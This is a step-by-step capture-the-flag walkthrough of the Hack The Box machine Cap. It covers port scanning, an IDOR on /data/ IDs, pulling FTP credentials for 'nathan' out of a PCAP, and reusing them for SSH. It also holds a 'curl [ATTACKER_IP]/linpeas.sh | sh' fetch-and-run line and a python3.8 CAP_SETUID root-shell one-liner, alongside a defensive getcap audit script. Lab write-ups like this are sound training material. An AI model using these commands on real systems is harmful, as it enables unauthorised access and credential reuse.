HTB - Cap Walkthrough
Walkthrough checklist for the Hack The Box machine Cap, covering an IDOR in the web app, PCAP analysis, and Linux capability exploitation.
1. Initial Scanning and Enumeration
- Identify open ports and service versions.
- Nmap Discovery:
nmap -sT 10.10.10.245 -T4 -vv
Ports found: 21 (FTP), 22 (SSH), 80 (HTTP).
- Service & Scripts:
nmap -sC -sV -p 21,22,80 10.10.10.245 -T4 -Pn
Identified vsftpd 3.0.3, OpenSSH 8.2p1, and Gunicorn.
2. Web Exploitation (IDOR)
Trigger a "Security Snapshot" on the dashboard.
Observe the redirection URL structure.
The browser is redirected to /data/[id]. The initial scan redirected to /data/10.
Perform IDOR testing on the /data/ endpoint.
Use Burp Suite Intruder to bruteforce the ID range (e.g., 0-10).
3. Traffic Analysis
Identify a PCAP file containing sensitive data (found in /data/0).
Analyze the PCAP file locally using Wireshark to extract credentials.
FTP credentials for the user 'nathan' were found in the pcap: FTP sends its USER and PASS commands in plaintext at the application layer, so the capture exposes them directly.
4. Gaining a Foothold
Log into the FTP server to confirm access and locate flags.
lftp -u nathan 10.10.10.245
Attempt to reuse the FTP credentials for SSH access.
ssh nathan@10.10.10.245
5. Privilege Escalation
- Transfer enumeration tools to the victim machine.
- Using SCP:
scp linpeas.sh nathan@10.10.10.245:/home/nathan
- Using Python HTTP server:
# Attacker
sudo python -m http.server 80
# Victim
curl [ATTACKER_IP]/linpeas.sh | sh
Analyze the LinPEAS output for privilege-escalation vectors.
Locate binaries with interesting Linux Capabilities.
getcap -r / 2>/dev/null
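Reading getcap output by eye is error-prone, so here is an added audit helper (not part of the original walkthrough) that parses `getcap -r /` output in both libcap formats and flags binaries carrying identity-changing capabilities such as CAP_SETUID, with an extra warning when the binary is a general-purpose interpreter like python3.8. The sample output is constructed, not captured from the box.

```python
import re

# Capabilities that let a process change identity or bypass access checks.
# On a general-purpose interpreter any of these is effectively root.
HIGH_RISK = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
             "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module"}
INTERPRETERS = re.compile(r"/(python[0-9.]*|perl[0-9.]*|ruby[0-9.]*|node|php[0-9.]*)$")


def parse_getcap_line(line):
    """Parse one `getcap -r /` line in either libcap output format:
    old:  /usr/bin/python3.8 = cap_setuid+ep
    new:  /usr/bin/python3.8 cap_setuid=ep
    Returns (path, {capability names}) or None for unparseable lines."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, caps = line.split(" = ", 1)
    else:
        path, _, caps = line.partition(" ")
    names = set(re.findall(r"cap_[a-z_]+", caps.lower()))
    if not path or not names:
        return None
    return path, names


def audit_getcap(output):
    """Return (path, risky caps, 'interpreter'|'binary') for every line whose
    capability set intersects HIGH_RISK, in input order."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, names = parsed
        risky = sorted(names & HIGH_RISK)
        if risky:
            kind = "interpreter" if INTERPRETERS.search(path) else "binary"
            findings.append((path, ",".join(risky), kind))
    return findings


# Constructed sample of `getcap -r / 2>/dev/null` output (hypothetical host).
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
"""

if __name__ == "__main__":
    for path, caps, kind in audit_getcap(SAMPLE_GETCAP):
        # Remediation is to drop the capability: setcap -r <path>
        print(f"[!] {path}: {caps} on a {kind}")
```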
6. Root Exploitation
Abuse the CAP_SETUID capability found on the Python 3.8 binary.
python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
Capture the root flag.
cat /root/root.txt